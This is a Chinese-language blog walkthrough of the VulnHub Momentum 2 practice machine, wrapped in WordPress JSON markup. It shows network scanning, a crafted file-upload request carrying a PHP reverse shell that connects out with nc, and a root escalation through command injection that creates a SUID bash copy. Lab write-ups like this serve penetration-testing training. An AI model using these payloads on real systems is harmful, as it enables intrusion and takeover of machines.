\u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776\u6a5f\u3002\u5b83\u88ab\u8a2d\u8a08\u70ba\u4e00\u500b\u4e2d\u7b49\u96e3\u5ea6\u7684\u6311\u6230\uff0c\u76ee\u6a19\u662f\u8b93\u6ef2\u900f\u6e2c\u8a66\u4eba\u54e1\u935b\u7df4PHP\u6e90\u78bc\u6aa2\u6e2c\u53ca\u6b0a\u9650\u63d0\u5347\u7684\u6280\u80fd\u3002\u8a72\u9776\u6a5f\u6ef2\u900f\u505a\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u6383\u63cf\u7db2\u6bb5 \u6383\u63cf\u76ee\u6a19\u4e3b\u6a5fport \u6383\u63cf\u7db2\u7ad9\u76ee\u9304 \u767c\u73fe\u5e7e\u500b\u7279\u5225\u7684\u6a94\u6848\u5982\u4e0b<\/p>\n\n\n\n \u8a2a\u554f\/dashboard.html\u767c\u73fe\u662f\u4e00\u500b\u6a94\u6848\u4e0a\u50b3\u7684\u9801\u9762, \u5206\u6790\u9801\u9762\u5f8c\u767c\u73fe\u4e3b\u8981\u529f\u80fd\u5728main.js\u5982\u4e0b<\/p>\n\n\n\n \u5f9e\u4ee3\u78bc\u4e2d\u767c\u73fe\u6703\u4f7f\u7528ajax.php\uff0cajax.php.bak\u4ee3\u78bc\u5982\u4e0b<\/p>\n\n\n\n \u4ee5\u4e0a\u8cc7\u8a0a\uff0c\u6574\u7406\u5982\u4e0b<\/p>\n\n\n\n \u914d\u5408\u9019\u4e9b\u8cc7\u8a0a\u8981\u5c07\u4e0a\u50b3\u6a94\u6848\u7684\u8acb\u6c42\u6539\u6210\u4ee5\u4e0b<\/p>\n\n\n\n \u653b\u64ca\u4e3b\u6a5f\u8981\u5728\u4e0a\u50b3shell.php\u524d\u5148\u76e3\u807dport 1234\uff0c\u4e0a\u50b3\u6210\u529f\u5f8c\u6703\u6536\u5230\u53cd\u5411shell\u7684\u4fe1\u606f<\/p>\n\n\n\n \u5c07shell\u63d0\u6607\u70ba\u4e92\u52d5\u5f0fshell\u5f8c\uff0c\u5c0b\u627e\u76ee\u6a19\u6a94\u6848\uff0c\u4e4b\u5f8c\u5728\u5bb6\u76ee\u9304\u4e0b\u767c\u73fe\u76ee\u6a19<\/p>\n\n\n\n \u8b80\u53d6password-reminder.txt\u767c\u73fe\u5bc6\u78bc\uff0c\u7d93\u6e2c\u8a66\u662fathena\u5bc6\u78bc<\/p>\n\n\n\n cookie-gen.py\u7684\u4ee3\u78bc\u5982\u4e0b<\/p>\n\n\n\n \u6839\u64da\u4e0a\u9762\u7684\u4ee3\u78bc\u767c\u73fe,\u8f38\u5165\u6578\u5b57\u5f8c,\u5f8c\u9762\u53ef\u4ee5\u63a5\u4efb\u4f55\u6307\u4ee4\u7528root\u8eab\u4efd\u57f7\u884c, \u4f7f\u7528 \u56e0\u6b64\u6539\u6210\u4ee5\u4e0b\u6307\u4ee4\u8907\u5236\u4e00\u500b\u81e8\u6642\u7684bash\u4e26\u7d66suid\u6b0a\u9650\uff0c\u57f7\u884c\u5f8c\u6210\u529f\u767b\u5165root<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n refer <\/p>\n\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" \u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[],"class_list":["post-1921","post","type-post","status-publish","format-standard","hentry","category-hackerskill"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1921"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1921\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}netdiscover -i eth0 -r 192.168.0.0\/24<\/code>\u767c\u73fe\u76ee\u6a19\u4e3b\u6a5f192.168.0.111<\/code><\/p>\n\n\n\nnmap 192.168.0.111<\/code>\u767c\u73fe22,80port\u958b\u653e<\/p>\n\n\n\ngobuster dir -u http:\/\/192.168.0.111\/ -x html,txt,php,bak --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/p>\n\n\n\n\n
\u5c0b\u627eweb\u6f0f\u6d1e<\/h2>\n\n\n\n
function uploadFile(){\n...omit...\n \/\/ Set POST method and ajax file path\n xhttp.open(\"POST\",\"ajax.php\",true);\n...omit...<\/code><\/pre>\n\n\n\n \/\/The boss told me to add one more Upper Case letter at the end of the cookie\n if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){\n\n \/\/[+] Add if $_POST['secure'] == 'val1d'\n $valid_ext = array(\"pdf\",\"php\",\"txt\");\n }\n else{\n\n $valid_ext = array(\"txt\");\n }\n\n \/\/ Remember success upload returns 1 <\/code><\/pre>\n\n\n\n\n
POST \/ajax.php HTTP\/1.1\nHost: 192.168.0.111\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------136110921536555815714284481441\nContent-Length: 5842\nOrigin: http:\/\/192.168.0.111\nConnection: close\nCookie: admin=&G6u@B6uDXMq&MsR\nReferer: http:\/\/192.168.0.111\/dashboard.html\n\n-----------------------------136110921536555815714284481441\nContent-Disposition: form-data; name=\"secure\"; \n\nval1d\n-----------------------------136110921536555815714284481441\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: application\/x-php\n\n<?php shell_exec('nc 192.168.0.100 1234 -s \/bin\/bash'); ?>\n\n-----------------------------136110921536555815714284481441--<\/code><\/pre>\n\n\n\n192.168.0.100 # nc -lvp 1234\nlistening on [any] 1234\nconnect to [192.168.0.100] from...omit...[192.168.0.111] \nwhoami\nwww-data<\/code><\/pre>\n\n\n\n\u63d0\u6b0a\u5230athena<\/h2>\n\n\n\n
www-data@momentum2:\/home\/athena$ ls\npassword-reminder.txt user.txt\nwww-data@momentum2:\/home\/athena$ cat user.txt\n...omit...\nFLAG:\n....omit...<\/code><\/pre>\n\n\n\nwww-data@momentum2:\/home\/athena$ cat password-reminder.txt\npassword : myvulnerableapp[Asterisk]\nwww-data@momentum2:\/home\/athena$ su athena\nsu athena\nPassword: myvulnerableapp*\nathena@momentum2:~$ <\/code><\/pre>\n\n\n\n\u63d0\u6b0aroot<\/h2>\n\n\n\n
athena@192.168.1.240:~$ sudo -l\nsudo -l\nMatching Defaults entries for athena on momentum2:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser athena may run the following commands on momentum2:\n (root) NOPASSWD: \/usr\/bin\/python3 \/home\/team-tasks\/cookie-gen.py<\/code><\/pre>\n\n\n\nimport random\nimport os\nimport subprocess\n\nprint('~ Random Cookie Generation ~')\nprint('[!] for security reasons we keep logs about cookie seeds.')\nchars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'\n\nseed = input(\"Enter the seed : \")\nrandom.seed = seed\n\ncookie = ''\nfor c in range(20):\n cookie += random.choice(chars)\n\nprint(cookie)\n\ncmd = \"echo %s >> log.txt\" % seed\nsubprocess.Popen(cmd, shell=True)<\/code><\/pre>\n\n\n\n2;bash -i<\/code>\u6e2c\u8a66\u767c\u73fe\u53ef\u4ee5\u4f46\u4e0d\u592a\u5b8c\u5584<\/p>\n\n\n\nathena@momentum2:~$ cd \/home\/team-tasks \nathena@momentum2:\/home\/team-tasks$ sudo python3 cookie-gen.py\n~ Random Cookie Generation ~\n[!] for security reasons we keep logs about cookie seeds.\nEnter the seed : 2;cp \/bin\/bash \/tmp\/bash; chmod u+s \/tmp\/bash<\/mark>\nSLhHfZUPTWW$WUGLDDWO\n2\nathena@momentum2:\/home\/team-tasks$ \/tmp\/bash \nbash-5.0# whoami\nroot\nbash-5.0# cd \/root\nbash-5.0# ls\nroot.txt\nbash-5.0# cat root.txt\n...omit...\nFLAG:\n...omit...<\/code><\/pre>\n\n\n\n
https:\/\/infosecwriteups.com\/vulnhub-momentum-2-walkthrough-8addad2e6a8f<\/a>
https:\/\/www.dotnetrussell.com\/index.php\/2021\/07\/16\/vulnhub-momentum2-vm-walkthrough<\/a>
https:\/\/blog.gibbons.digital\/hacking\/2021\/07\/11\/momentum.html<\/a>
https:\/\/nepcodex.com\/2021\/06\/momentum-2-walkthrough-vulnhub-writeup<\/a><\/p>\n\n\n\n